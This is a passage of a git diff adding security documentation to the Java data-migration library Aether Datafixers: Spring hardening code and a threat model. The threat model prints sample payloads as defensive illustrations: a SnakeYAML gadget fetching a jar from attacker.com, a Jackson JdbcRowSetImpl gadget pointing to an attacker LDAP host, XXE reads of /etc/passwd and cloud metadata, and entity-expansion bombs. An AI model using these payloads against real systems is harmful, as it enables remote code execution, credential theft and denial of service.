+2. **Request Validation** — Validate payloads before they reach migration endpoints
+3. **Rate Limiting** — Prevent abuse of migration endpoints
+4. **Audit Logging** — Track migration attempts for security monitoring
+
+---
+
+## Secure Bean Configuration
+
+### Secure Parser Beans
+
+```java
+import org.springframework.context.annotation.Bean;
+import org.springframework.context.annotation.Configuration;
+import org.yaml.snakeyaml.LoaderOptions;
+import org.yaml.snakeyaml.Yaml;
+import org.yaml.snakeyaml.constructor.SafeConstructor;
+import com.fasterxml.jackson.databind.ObjectMapper;
+import com.fasterxml.jackson.core.JsonFactory;
+import com.fasterxml.jackson.core.StreamReadConstraints;
+import com.fasterxml.jackson.dataformat.xml.XmlFactory;
+import com.fasterxml.jackson.dataformat.xml.XmlMapper;
+import javax.xml.stream.XMLInputFactory;
+
+@Configuration
+public class SecureDataFixerConfig {
+
+    @Bean
+    public Yaml secureYaml() {
+        LoaderOptions options = new LoaderOptions();
+        options.setMaxAliasesForCollections(50);
+        options.setNestingDepthLimit(50);
+        options.setCodePointLimit(3 * 1024 * 1024);
+        options.setAllowDuplicateKeys(false);
+        return new Yaml(new SafeConstructor(options));
+    }
+
+    @Bean
+    public ObjectMapper secureJsonMapper() {
+        StreamReadConstraints constraints = StreamReadConstraints.builder()
+            .maxNestingDepth(50)
+            .maxNumberLength(100)
+            .maxStringLength(1_000_000)
+            .build();
+
+        JsonFactory factory = JsonFactory.builder()
+            .streamReadConstraints(constraints)
+            .build();
+
+        return new ObjectMapper(factory);
+    }
+
+    @Bean
+    public XmlMapper secureXmlMapper() {
+        XMLInputFactory xmlInputFactory = XMLInputFactory.newFactory();
+        xmlInputFactory.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false);
+        xmlInputFactory.setProperty(XMLInputFactory.SUPPORT_DTD, false);
+
+        StreamReadConstraints constraints = StreamReadConstraints.builder()
+            .maxNestingDepth(50)
+            .maxStringLength(1_000_000)
+            .build();
+
+        XmlFactory factory = XmlFactory.builder()
+            .xmlInputFactory(xmlInputFactory)
+            .streamReadConstraints(constraints)
+            .build();
+
+        return XmlMapper.builder(factory).build();
+    }
+}
+```
+
+### Secure DynamicOps Beans
+
+```java
+import de.splatgames.aether.datafixers.codec.json.jackson.JacksonJsonOps;
+import de.splatgames.aether.datafixers.codec.xml.jackson.JacksonXmlOps;
+
+@Configuration
+public class SecureDynamicOpsConfig {
+
+    @Bean
+    public JacksonJsonOps secureJsonOps(ObjectMapper secureJsonMapper) {
+        return new JacksonJsonOps(secureJsonMapper);
+    }
+
+    @Bean
+    public JacksonXmlOps secureXmlOps(XmlMapper secureXmlMapper) {
+        return new JacksonXmlOps(secureXmlMapper);
+    }
+}
+```
+
+---
+
+## Request Validation Filter
+
+### Payload Size Validation
+
+```java
+import jakarta.servlet.FilterChain;
+import jakarta.servlet.ServletException;
+import jakarta.servlet.http.HttpServletRequest;
+import jakarta.servlet.http.HttpServletResponse;
+import org.springframework.core.Ordered;
+import org.springframework.core.annotation.Order;
+import org.springframework.http.HttpStatus;
+import org.springframework.stereotype.Component;
+import org.springframework.web.filter.OncePerRequestFilter;
+
+import java.io.IOException;
+
+@Component
+@Order(Ordered.HIGHEST_PRECEDENCE)
+public class PayloadSizeValidationFilter extends OncePerRequestFilter {
+
+    private static final long MAX_PAYLOAD_SIZE = 10 * 1024 * 1024; // 10MB
+
+    @Override
+    protected void doFilterInternal(
+            HttpServletRequest request,
+            HttpServletResponse response,
+            FilterChain chain) throws ServletException, IOException {
+
+        // Check Content-Length header
+        long contentLength = request.getContentLengthLong();
+        if (contentLength > MAX_PAYLOAD_SIZE) {
+            response.setStatus(HttpStatus.PAYLOAD_TOO_LARGE.value());
+            response.getWriter().write("Payload exceeds maximum size");
+            return;
+        }
+
+        chain.doFilter(request, response);
+    }
+
+    @Override
+    protected boolean shouldNotFilter(HttpServletRequest request) {
+        // Only filter migration endpoints
+        return !request.getRequestURI().startsWith("/api/migrate");
+    }
+}
+```
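+
+Note that `Content-Length` can be `-1` for chunked requests, so a cap based on the header alone can be bypassed; enforcing a hard limit while reading the body closes that gap. A minimal sketch — the helper name and limit are illustrative:
+
+```java
+import java.io.ByteArrayOutputStream;
+import java.io.InputStream;
+
+// Sketch: hard limit while reading, for requests without Content-Length
+private byte[] readBounded(HttpServletRequest request, long maxBytes) throws IOException {
+    ByteArrayOutputStream out = new ByteArrayOutputStream();
+    byte[] buffer = new byte[8192];
+    long total = 0;
+    try (InputStream in = request.getInputStream()) {
+        int n;
+        while ((n = in.read(buffer)) != -1) {
+            total += n;
+            if (total > maxBytes) {
+                throw new SecurityException("Payload exceeds maximum size");
+            }
+            out.write(buffer, 0, n);
+        }
+    }
+    return out.toByteArray();
+}
+```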
+
+### Content-Type Validation
+
+```java
+import org.springframework.http.MediaType;
+
+@Component
+@Order(Ordered.HIGHEST_PRECEDENCE + 1)
+public class ContentTypeValidationFilter extends OncePerRequestFilter {
+
+    private static final Set<String> ALLOWED_CONTENT_TYPES = Set.of(
+        MediaType.APPLICATION_JSON_VALUE,
+        "application/yaml",
+        "text/yaml",
+        MediaType.APPLICATION_XML_VALUE,
+        MediaType.TEXT_XML_VALUE
+    );
+
+    @Override
+    protected void doFilterInternal(
+            HttpServletRequest request,
+            HttpServletResponse response,
+            FilterChain chain) throws ServletException, IOException {
+
+        String contentType = request.getContentType();
+        if (contentType != null) {
+            String baseType = contentType.split(";")[0].trim().toLowerCase();
+            if (!ALLOWED_CONTENT_TYPES.contains(baseType)) {
+                response.setStatus(HttpStatus.UNSUPPORTED_MEDIA_TYPE.value());
+                response.getWriter().write("Unsupported content type");
+                return;
+            }
+        }
+
+        chain.doFilter(request, response);
+    }
+
+    @Override
+    protected boolean shouldNotFilter(HttpServletRequest request) {
+        return !request.getRequestURI().startsWith("/api/migrate") ||
+               !"POST".equalsIgnoreCase(request.getMethod());
+    }
+}
+```
+
+---
+
+## Rate Limiting
+
+### Using Resilience4j
+
+Add dependency:
+
+```xml
+<dependency>
+    <groupId>io.github.resilience4j</groupId>
+    <artifactId>resilience4j-spring-boot3</artifactId>
+    <version>2.2.0</version>
+</dependency>
+```
+
+Configuration:
+
+```yaml
+# application.yml
+resilience4j:
+  ratelimiter:
+    instances:
+      migration:
+        limitForPeriod: 10
+        limitRefreshPeriod: 1s
+        timeoutDuration: 0
+```
+
+Controller:
+
+```java
+import io.github.resilience4j.ratelimiter.annotation.RateLimiter;
+
+@RestController
+@RequestMapping("/api/migrate")
+public class MigrationController {
+
+    private final MigrationService migrationService;
+
+    public MigrationController(MigrationService migrationService) {
+        this.migrationService = migrationService;
+    }
+
+    @PostMapping("/json")
+    @RateLimiter(name = "migration", fallbackMethod = "rateLimitFallback")
+    public ResponseEntity<MigrationResult> migrateJson(
+            @RequestBody byte[] data,
+            @RequestParam int fromVersion,
+            @RequestParam int toVersion,
+            @RequestParam String type) {
+
+        MigrationResult result = migrationService
+            .migrate(data)
+            .from(fromVersion)
+            .to(toVersion)
+            .execute();
+
+        return ResponseEntity.ok(result);
+    }
+
+    public ResponseEntity<MigrationResult> rateLimitFallback(
+            byte[] data, int fromVersion, int toVersion, String type, Throwable t) {
+        return ResponseEntity.status(HttpStatus.TOO_MANY_REQUESTS)
+            .body(MigrationResult.error("Rate limit exceeded. Please try again later."));
+    }
+}
+```
+
+### Using Bucket4j
+
+```java
+import io.github.bucket4j.Bandwidth;
+import io.github.bucket4j.Bucket;
+import io.github.bucket4j.Refill;
+import org.springframework.stereotype.Component;
+
+import java.time.Duration;
+import java.util.Map;
+import java.util.concurrent.ConcurrentHashMap;
+
+@Component
+public class RateLimitingService {
+
+    private final Map<String, Bucket> buckets = new ConcurrentHashMap<>();
+
+    public Bucket resolveBucket(String userId) {
+        return buckets.computeIfAbsent(userId, this::createBucket);
+    }
+
+    private Bucket createBucket(String userId) {
+        Bandwidth limit = Bandwidth.classic(10, Refill.greedy(10, Duration.ofMinutes(1)));
+        return Bucket.builder().addLimit(limit).build();
+    }
+
+    public boolean tryConsume(String userId) {
+        return resolveBucket(userId).tryConsume(1);
+    }
+}
+```
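+
+The service can then gate migration endpoints per authenticated user. A sketch — the endpoint, principal lookup, and the call into `migrateYamlSecurely` (defined below) are illustrative:
+
+```java
+// Sketch: per-user gate in a controller method
+@PostMapping("/yaml")
+public ResponseEntity<MigrationResult> migrateYaml(
+        @RequestBody String data, java.security.Principal principal) {
+
+    if (!rateLimitingService.tryConsume(principal.getName())) {
+        return ResponseEntity.status(HttpStatus.TOO_MANY_REQUESTS).build();
+    }
+    return ResponseEntity.ok(
+        secureMigrationService.migrateYamlSecurely(data, 1, 2));
+}
+```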
+
+---
+
+## Audit Logging
+
+### Audit Aspect
+
+```java
+import org.aspectj.lang.ProceedingJoinPoint;
+import org.aspectj.lang.annotation.Around;
+import org.aspectj.lang.annotation.Aspect;
+import org.slf4j.Logger;
+import org.slf4j.LoggerFactory;
+import org.springframework.security.core.context.SecurityContextHolder;
+import org.springframework.stereotype.Component;
+
+@Aspect
+@Component
+public class MigrationAuditAspect {
+
+    private static final Logger AUDIT_LOG = LoggerFactory.getLogger("MIGRATION_AUDIT");
+
+    @Around("execution(* de.splatgames.aether.datafixers.spring.service.MigrationService.migrate(..))")
+    public Object auditMigration(ProceedingJoinPoint joinPoint) throws Throwable {
+        String user = getCurrentUser();
+        long startTime = System.currentTimeMillis();
+
+        try {
+            Object result = joinPoint.proceed();
+            long duration = System.currentTimeMillis() - startTime;
+
+            AUDIT_LOG.info("MIGRATION_SUCCESS user={} duration={}ms", user, duration);
+
+            return result;
+        } catch (Exception e) {
+            long duration = System.currentTimeMillis() - startTime;
+
+            AUDIT_LOG.warn("MIGRATION_FAILURE user={} duration={}ms error={}",
+                user, duration, e.getMessage());
+
+            throw e;
+        }
+    }
+
+    private String getCurrentUser() {
+        try {
+            return SecurityContextHolder.getContext()
+                .getAuthentication()
+                .getName();
+        } catch (Exception e) {
+            return "anonymous";
+        }
+    }
+}
+```
+
+### Structured Logging with MDC
+
+```java
+import org.slf4j.MDC;
+
+@Component
+public class MigrationAuditAspect {
+
+    private static final Logger LOG = LoggerFactory.getLogger(MigrationAuditAspect.class);
+
+    @Around("execution(* MigrationService.migrate(..))")
+    public Object auditMigration(ProceedingJoinPoint joinPoint) throws Throwable {
+        String migrationId = UUID.randomUUID().toString();
+
+        MDC.put("migrationId", migrationId);
+        MDC.put("user", getCurrentUser());
+        MDC.put("clientIp", getClientIp());
+
+        try {
+            Object result = joinPoint.proceed();
+            LOG.info("Migration completed successfully");
+            return result;
+        } catch (SecurityException e) {
+            LOG.warn("Migration blocked: {}", e.getMessage());
+            throw e;
+        } catch (Exception e) {
+            LOG.error("Migration failed: {}", e.getMessage());
+            throw e;
+        } finally {
+            MDC.clear();
+        }
+    }
+}
+```
+
+---
+
+## Secure Migration Service
+
+### Complete Integration Example
+
+```java
+import de.splatgames.aether.datafixers.spring.service.MigrationService;
+import de.splatgames.aether.datafixers.spring.service.MigrationResult;
+import org.springframework.stereotype.Service;
+import org.yaml.snakeyaml.Yaml;
+
+@Service
+public class SecureMigrationService {
+
+    private static final long MAX_SIZE = 10 * 1024 * 1024;
+
+    private final MigrationService migrationService;
+    private final Yaml secureYaml;
+    private final ObjectMapper secureJsonMapper;
+    private final XmlMapper secureXmlMapper;
+
+    public SecureMigrationService(
+            MigrationService migrationService,
+            Yaml secureYaml,
+            ObjectMapper secureJsonMapper,
+            XmlMapper secureXmlMapper) {
+        this.migrationService = migrationService;
+        this.secureYaml = secureYaml;
+        this.secureJsonMapper = secureJsonMapper;
+        this.secureXmlMapper = secureXmlMapper;
+    }
+
+    public MigrationResult migrateJsonSecurely(
+            byte[] input,
+            int fromVersion,
+            int toVersion) {
+
+        validateSize(input);
+
+        try {
+            JsonNode node = secureJsonMapper.readTree(input);
+            TaggedDynamic<JsonNode> tagged = new TaggedDynamic<>(
+                TypeReferences.DATA,
+                new Dynamic<>(JacksonJsonOps.INSTANCE, node)
+            );
+
+            return migrationService
+                .migrate(tagged)
+                .from(fromVersion)
+                .to(toVersion)
+                .execute();
+        } catch (Exception e) {
+            throw new MigrationException("JSON migration failed", e);
+        }
+    }
+
+    public MigrationResult migrateYamlSecurely(
+            String input,
+            int fromVersion,
+            int toVersion) {
+
+        validateSize(input);
+
+        Object data = secureYaml.load(input);
+        TaggedDynamic<Object> tagged = new TaggedDynamic<>(
+            TypeReferences.DATA,
+            new Dynamic<>(SnakeYamlOps.INSTANCE, data)
+        );
+
+        return migrationService
+            .migrate(tagged)
+            .from(fromVersion)
+            .to(toVersion)
+            .execute();
+    }
+
+    public MigrationResult migrateXmlSecurely(
+            String input,
+            int fromVersion,
+            int toVersion) {
+
+        validateSize(input);
+
+        try {
+            JsonNode node = secureXmlMapper.readTree(input);
+            TaggedDynamic<JsonNode> tagged = new TaggedDynamic<>(
+                TypeReferences.DATA,
+                new Dynamic<>(new JacksonXmlOps(secureXmlMapper), node)
+            );
+
+            return migrationService
+                .migrate(tagged)
+                .from(fromVersion)
+                .to(toVersion)
+                .execute();
+        } catch (Exception e) {
+            throw new MigrationException("XML migration failed", e);
+        }
+    }
+
+    private void validateSize(byte[] input) {
+        if (input.length > MAX_SIZE) {
+            throw new PayloadTooLargeException("Input exceeds maximum size");
+        }
+    }
+
+    private void validateSize(String input) {
+        if (input.length() > MAX_SIZE) {
+            throw new PayloadTooLargeException("Input exceeds maximum size");
+        }
+    }
+}
+```
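+
+A controller can then delegate to the service per format. A sketch — the endpoint paths and parameter names are illustrative:
+
+```java
+@RestController
+@RequestMapping("/api/migrate")
+public class SecureMigrationController {
+
+    private final SecureMigrationService service;
+
+    public SecureMigrationController(SecureMigrationService service) {
+        this.service = service;
+    }
+
+    // Size validation, secure parsing, and migration all happen in the service
+    @PostMapping("/json")
+    public MigrationResult migrateJson(
+            @RequestBody byte[] body,
+            @RequestParam int fromVersion,
+            @RequestParam int toVersion) {
+        return service.migrateJsonSecurely(body, fromVersion, toVersion);
+    }
+}
+```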
+
+---
+
+## Exception Handling
+
+### Global Exception Handler
+
+```java
+import org.springframework.http.HttpStatus;
+import org.springframework.http.ResponseEntity;
+import org.springframework.web.bind.annotation.ExceptionHandler;
+import org.springframework.web.bind.annotation.RestControllerAdvice;
+
+@RestControllerAdvice
+public class MigrationExceptionHandler {
+
+    private static final Logger LOG = LoggerFactory.getLogger(MigrationExceptionHandler.class);
+
+    @ExceptionHandler(PayloadTooLargeException.class)
+    public ResponseEntity<ErrorResponse> handlePayloadTooLarge(PayloadTooLargeException e) {
+        LOG.warn("Payload too large: {}", e.getMessage());
+        return ResponseEntity
+            .status(HttpStatus.PAYLOAD_TOO_LARGE)
+            .body(new ErrorResponse("PAYLOAD_TOO_LARGE", "Payload exceeds maximum size"));
+    }
+
+    @ExceptionHandler(SecurityException.class)
+    public ResponseEntity<ErrorResponse> handleSecurityException(SecurityException e) {
+        LOG.warn("Security violation: {}", e.getMessage());
+        return ResponseEntity
+            .status(HttpStatus.BAD_REQUEST)
+            .body(new ErrorResponse("SECURITY_VIOLATION", "Invalid input detected"));
+    }
+
+    @ExceptionHandler(MigrationTimeoutException.class)
+    public ResponseEntity<ErrorResponse> handleTimeout(MigrationTimeoutException e) {
+        LOG.error("Migration timeout: {}", e.getMessage());
+        return ResponseEntity
+            .status(HttpStatus.GATEWAY_TIMEOUT)
+            .body(new ErrorResponse("MIGRATION_TIMEOUT", "Migration timed out"));
+    }
+
+    @ExceptionHandler(MigrationException.class)
+    public ResponseEntity<ErrorResponse> handleMigrationError(MigrationException e) {
+        LOG.error("Migration failed: {}", e.getMessage());
+        // Don't expose internal error details
+        return ResponseEntity
+            .status(HttpStatus.INTERNAL_SERVER_ERROR)
+            .body(new ErrorResponse("MIGRATION_FAILED", "Migration failed"));
+    }
+
+    public record ErrorResponse(String code, String message) {}
+}
+```
+
+---
+
+## Configuration Properties
+
+### Security Properties
+
+```yaml
+# application.yml
+aether:
+  datafixers:
+    security:
+      max-payload-size: 10485760 # 10MB
+      max-nesting-depth: 50
+      migration-timeout: 30s
+      rate-limit:
+        requests-per-minute: 60
+```
+
+```java
+@ConfigurationProperties(prefix = "aether.datafixers.security")
+public record SecurityProperties(
+    long maxPayloadSize,
+    int maxNestingDepth,
+    Duration migrationTimeout,
+    RateLimitProperties rateLimit
+) {
+    public record RateLimitProperties(int requestsPerMinute) {}
+}
+```
+
+---
+
+## Health Indicator
+
+### Security Health Check
+
+```java
+import org.springframework.boot.actuate.health.Health;
+import org.springframework.boot.actuate.health.HealthIndicator;
+import org.springframework.stereotype.Component;
+
+@Component
+public class SecureMigrationHealthIndicator implements HealthIndicator {
+
+    private final Yaml secureYaml;
+    private final ObjectMapper secureJsonMapper;
+
+    public SecureMigrationHealthIndicator(Yaml secureYaml, ObjectMapper secureJsonMapper) {
+        this.secureYaml = secureYaml;
+        this.secureJsonMapper = secureJsonMapper;
+    }
+
+    @Override
+    public Health health() {
+        try {
+            // Verify secure configurations are active
+            verifyYamlSecurity();
+            verifyJacksonSecurity();
+
+            return Health.up()
+                .withDetail("yaml", "SafeConstructor enabled")
+                .withDetail("jackson", "StreamReadConstraints configured")
+                .build();
+        } catch (Exception e) {
+            return Health.down()
+                .withDetail("error", e.getMessage())
+                .build();
+        }
+    }
+
+    private void verifyYamlSecurity() {
+        // Attempting to parse a malicious payload should fail
+        String malicious = "!!java.lang.ProcessBuilder [[\"test\"]]";
+        try {
+            secureYaml.load(malicious);
+            throw new IllegalStateException("SafeConstructor not configured!");
+        } catch (org.yaml.snakeyaml.constructor.ConstructorException e) {
+            // Expected - SafeConstructor is working
+        }
+    }
+
+    private void verifyJacksonSecurity() {
+        // Verify constraints are configured
+        JsonFactory factory = secureJsonMapper.getFactory();
+        StreamReadConstraints constraints = factory.streamReadConstraints();
+        if (constraints.getMaxNestingDepth() > 100) {
+            throw new IllegalStateException("Nesting depth limit too high");
+        }
+    }
+}
+```
+
+---
+
+## Related
+
+- [Best Practices](best-practices.md)
+- [Secure Configuration Examples](secure-configuration-examples.md)
+- [Spring Boot Overview](../spring-boot/index.md)
+- [MigrationService API](../spring-boot/migration-service.md)
diff --git a/docs/security/threat-model.md b/docs/security/threat-model.md
new file mode 100644
index 0000000..0516ca2
--- /dev/null
+++ b/docs/security/threat-model.md
@@ -0,0 +1,278 @@
+# Threat Model
+
+This document describes the threat model for Aether Datafixers when processing untrusted data. Understanding these threats helps you make informed decisions about security controls.
+
+## Overview
+
+Aether Datafixers processes serialized data (JSON, YAML, XML, TOML) and applies migrations to transform it between schema versions. When this data comes from untrusted sources, attackers may craft malicious payloads to exploit vulnerabilities in the parsing or processing pipeline.
+
+## Trust Boundaries
+
+```
+┌─────────────────────────────────────────────────────────────────┐
+│                         UNTRUSTED ZONE                          │
+│                                                                 │
+│  ┌──────────┐  ┌──────────┐  ┌──────────┐  ┌──────────────┐     │
+│  │  User    │  │ External │  │ Message  │  │  Database    │     │
+│  │ Uploads  │  │   APIs   │  │  Queues  │  │   Blobs      │     │
+│  └────┬─────┘  └────┬─────┘  └────┬─────┘  └──────┬───────┘     │
+│       │             │             │               │             │
+└───────┼─────────────┼─────────────┼───────────────┼─────────────┘
+        │             │             │               │
+        ▼             ▼             ▼               ▼
+╔═══════════════════════════════════════════════════════════════╗
+║                         TRUST BOUNDARY                        ║
+║  ┌─────────────────────────────────────────────────────────┐  ║
+║  │                    INPUT VALIDATION                     │  ║
+║  │  • Size limits   • Depth limits   • Format validation   │  ║
+║  └─────────────────────────────────────────────────────────┘  ║
+╚═══════════════════════════════════════════════════════════════╝
+                              │
+                              ▼
+┌─────────────────────────────────────────────────────────────────┐
+│                          TRUSTED ZONE                           │
+│                                                                 │
+│  ┌───────────────┐    ┌────────────────┐    ┌───────────────┐   │
+│  │  DynamicOps   │───▶│   DataFixer    │───▶│  Application  │   │
+│  │  (Parsing)    │    │  (Migration)   │    │     Logic     │   │
+│  └───────────────┘    └────────────────┘    └───────────────┘   │
+│                                                                 │
+└─────────────────────────────────────────────────────────────────┘
+```
+
+### Untrusted Data Sources
+
+| Source             | Examples                                | Trust Level                                       |
+|--------------------|-----------------------------------------|---------------------------------------------------|
+| User Uploads       | Game saves, config imports, data files  | **Untrusted**                                     |
+| External APIs      | Third-party integrations, webhooks      | **Untrusted**                                     |
+| Message Queues     | Kafka topics, RabbitMQ queues           | **Untrusted** (unless internal)                   |
+| Database Blobs     | Serialized objects in DB columns        | **Semi-trusted** (may contain legacy unsafe data) |
+| Internal Services  | Same-cluster microservices              | **Trusted** (if properly authenticated)           |
+| Local Config Files | Application configuration               | **Trusted** (deployed by operators)               |
+
+## Attack Vectors
+
+### 1. Arbitrary Code Execution (RCE)
+
+**Severity:** Critical
+**Affected:** SnakeYAML (default constructor)
+
+SnakeYAML's default constructor can instantiate arbitrary Java classes, allowing attackers to execute code by crafting malicious YAML:
+
+```yaml
+# Malicious YAML that attempts to execute code
+!!javax.script.ScriptEngineManager [
+  !!java.net.URLClassLoader [[
+    !!java.net.URL ["http://attacker.com/malicious.jar"]
+  ]]
+]
+```
+
+**Impact:** Complete system compromise, data theft, lateral movement.
+
+**Mitigation:** Always use `SafeConstructor` for untrusted YAML. See [SnakeYAML Security](format-considerations/snakeyaml.md).
+
+---
+
+### 2. Billion Laughs Attack (Entity Expansion)
+
+**Severity:** High
+**Affected:** YAML (aliases), XML (entities)
+
+Exponential expansion of aliases or entities can consume all available memory:
+
+```yaml
+# YAML Billion Laughs
+a: &a ["lol","lol","lol","lol","lol","lol","lol","lol","lol"]
+b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a]
+c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b]
+d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c]
+e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d]
+f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e]
+# Expands to billions of elements
+```
+
+```xml
+<?xml version="1.0"?>
+<!DOCTYPE lolz [
+  <!ENTITY lol "lol">
+  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
+  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
+  <!-- ... lol4 through lol9, each expanding the previous tenfold ... -->
+]>
+<lolz>&lol9;</lolz>
+```
+
+**Impact:** Denial of Service through memory exhaustion, application crash.
+
+**Mitigation:**
+- YAML: Set `maxAliasesForCollections` in `LoaderOptions`
+- XML: Disable DTD processing or limit entity expansion
+
+### 3. XXE (XML External Entity) Injection
+
+**Severity:** High
+**Affected:** XML
+
+External entity references can read local files or make server-side requests:
+
+```xml
+<!DOCTYPE foo [
+  <!ENTITY xxe SYSTEM "file:///etc/passwd">
+]>
+<foo>&xxe;</foo>
+```
+
+```xml
+<?xml version="1.0"?>
+<!DOCTYPE foo [
+  <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">
+]>
+<foo>&xxe;</foo>
+```
+
+**Impact:**
+- **Confidentiality:** Read sensitive files (credentials, configs)
+- **SSRF:** Access internal services, cloud metadata endpoints
+- **DoS:** Reference slow or infinite resources
+
+**Mitigation:** Disable external entity processing and DTDs. See [Jackson XML Security](format-considerations/jackson.md#xxe-prevention).
+
+---
+
+### 4. Polymorphic Deserialization Attacks
+
+**Severity:** Medium-High
+**Affected:** Jackson (with default typing enabled)
+
+When Jackson's default typing is enabled, attackers can specify arbitrary classes for deserialization:
+
+```json
+{
+  "@class": "com.sun.rowset.JdbcRowSetImpl",
+  "dataSourceName": "ldap://attacker.com/exploit",
+  "autoCommit": true
+}
+```
+
+**Impact:** Remote code execution through gadget chains.
+
+**Mitigation:** Never enable default typing for untrusted data. If polymorphic deserialization is required, use an allowlist-based `PolymorphicTypeValidator`. See [Jackson Security](format-considerations/jackson.md).
+
+---
+
+### 5. Resource Exhaustion (DoS)
+
+**Severity:** Medium
+**Affected:** All formats
+
+Large payloads or deeply nested structures can exhaust memory or CPU:
+
+```json
+{
+  "a": {
+    "b": {
+      "c": {
+        // ... nested 10,000 levels deep
+      }
+    }
+  }
+}
+```
+
+**Impact:** Denial of Service, application unresponsiveness.
+
+**Mitigation:**
+- Validate input size before parsing
+- Configure nesting depth limits
+- Set string length limits
+- Implement timeouts
+
+---
+
+### 6. Stack Overflow
+
+**Severity:** Medium
+**Affected:** All formats (recursive parsing)
+
+Deeply nested structures can cause stack overflow during parsing or migration:
+
+```json
+[[[[[[[[[[[[[[[[[[[[[[...]]]]]]]]]]]]]]]]]]]]]]
+```
+
+**Impact:** Application crash, potential DoS.
+
+**Mitigation:** Configure nesting depth limits in parser settings.
+
+---
+
+## Impact Assessment
+
+| Attack                      | Confidentiality | Integrity | Availability |
+|-----------------------------|-----------------|-----------|--------------|
+| RCE (SnakeYAML)             | High            | High      | High         |
+| Billion Laughs              | Low             | Low       | **High**     |
+| XXE                         | **High**        | Low       | Medium       |
+| Polymorphic Deserialization | High            | High      | High         |
+| Resource Exhaustion         | Low             | Low       | **High**     |
+| Stack Overflow              | Low             | Low       | High         |
+
+## Attack Scenarios
+
+### Scenario 1: Game Save Import
+
+A gaming platform allows users to import save files in YAML format.
+
+**Attack:** A user uploads a YAML file with malicious constructor tags.
+**Impact:** RCE on the game server, access to other users' data.
+**Defense:** Use `SafeConstructor`, validate file size, sandbox processing.
+
+### Scenario 2: Configuration API
+
+A microservice accepts JSON configuration updates via REST API.
+
+**Attack:** An attacker sends deeply nested JSON to exhaust memory.
+**Impact:** The service becomes unresponsive, affecting all users.
+**Defense:** Size limits, depth limits, rate limiting.
+
+### Scenario 3: Legacy Data Migration
+
+An application migrates XML data stored in database blobs.
+
+**Attack:** Legacy data contains XXE payloads (intentional or from old vulnerabilities).
+**Impact:** Data exfiltration during the migration process.
+**Defense:** Disable external entities, validate before migration.
+
+### Scenario 4: Webhook Processing
+
+A service processes webhook payloads from third-party integrations.
+
+**Attack:** A malicious webhook sends a payload with polymorphic type hints.
+**Impact:** RCE through deserialization gadgets.
+**Defense:** Never enable default typing, validate webhook signatures.
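+
+If polymorphic deserialization genuinely cannot be avoided, an allowlist-based validator limits the damage. A minimal sketch (the `com.example.model.` package prefix is a placeholder for your own type hierarchy, not library API):
+
+```java
+import com.fasterxml.jackson.databind.ObjectMapper;
+import com.fasterxml.jackson.databind.json.JsonMapper;
+import com.fasterxml.jackson.databind.jsontype.BasicPolymorphicTypeValidator;
+import com.fasterxml.jackson.databind.jsontype.PolymorphicTypeValidator;
+
+PolymorphicTypeValidator ptv = BasicPolymorphicTypeValidator.builder()
+        .allowIfSubType("com.example.model.") // only your own types; never java.* or broad prefixes
+        .build();
+
+ObjectMapper mapper = JsonMapper.builder()
+        .activateDefaultTyping(ptv, ObjectMapper.DefaultTyping.NON_FINAL)
+        .build();
+```
+
+Gadget classes such as `com.sun.rowset.JdbcRowSetImpl` then fail validation before they are ever instantiated.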
+
+## Security Checklist
+
+Before processing untrusted data, verify:
+
+- [ ] Input size is validated before parsing
+- [ ] Parser is configured with depth/nesting limits
+- [ ] Format-specific protections are enabled:
+    - [ ] YAML: Using `SafeConstructor` with alias limits
+    - [ ] XML: External entities and DTDs disabled
+    - [ ] Jackson: Default typing is NOT enabled
+- [ ] Timeouts are configured for migration operations
+- [ ] Errors are logged without exposing sensitive information
+- [ ] Rate limiting is applied for user-submitted data
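+
+A small regression test keeps this checklist enforced, so a refactor or dependency upgrade cannot silently relax the limits. A sketch (assuming JUnit 5 and AssertJ, with the secure `Yaml` and `ObjectMapper` instances from the configuration examples wired in by the test context):
+
+```java
+import static org.assertj.core.api.Assertions.assertThat;
+import static org.assertj.core.api.Assertions.assertThatThrownBy;
+
+import com.fasterxml.jackson.databind.ObjectMapper;
+import org.junit.jupiter.api.Test;
+import org.yaml.snakeyaml.Yaml;
+
+class SecurityConfigurationTest {
+
+    // Provided by the application context in a real test (e.g. @SpringBootTest + @Autowired)
+    private Yaml secureYaml;
+    private ObjectMapper secureJsonMapper;
+
+    @Test
+    void jacksonNestingDepthIsBounded() {
+        assertThat(secureJsonMapper.getFactory().streamReadConstraints().getMaxNestingDepth())
+                .isLessThanOrEqualTo(100);
+    }
+
+    @Test
+    void yamlRejectsArbitraryJavaTypes() {
+        assertThatThrownBy(() -> secureYaml.load("!!java.lang.ProcessBuilder [[\"x\"]]"))
+                .isInstanceOf(org.yaml.snakeyaml.constructor.ConstructorException.class);
+    }
+}
+```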
+
+## Related
+
+- [Best Practices](best-practices.md)
+- [Format-Specific Security](format-considerations/index.md)
+- [Secure Configuration Examples](secure-configuration-examples.md)
diff --git a/docs/testkit/test-data-builders.md b/docs/testkit/test-data-builders.md
index 157dba9..283e849 100644
--- a/docs/testkit/test-data-builders.md
+++ b/docs/testkit/test-data-builders.md
@@ -31,8 +31,6 @@
 TestData.jacksonXml()...
 TestData.using(myCustomOps)...
 ```
-> **Deprecation Notice:** `TestData.jackson()` is deprecated since 0.5.0 and will be removed in 1.0.0. Use `TestData.jacksonJson()` instead for explicit format naming.
-
 ## Creating Primitives
 
 ```java
diff --git a/docs/troubleshooting/index.md b/docs/troubleshooting/index.md
index 1012d62..98544fa 100644
--- a/docs/troubleshooting/index.md
+++ b/docs/troubleshooting/index.md
@@ -8,6 +8,12 @@ Solutions to common issues with Aether Datafixers.
 - [Debugging Tips](debugging-tips.md) — Strategies for finding issues
 - [FAQ](faq.md) — Frequently asked questions
 
+## Operations Runbook
+
+For production operations, incident response, and recovery procedures, see the [Operations Runbook](../operations/index.md).
+
+---
+
 ## Quick Fixes
 
 ### Migration Not Applied
diff --git a/pom.xml b/pom.xml
index 254ac21..ac74cb0 100644
--- a/pom.xml
+++ b/pom.xml
@@ -6,7 +6,7 @@
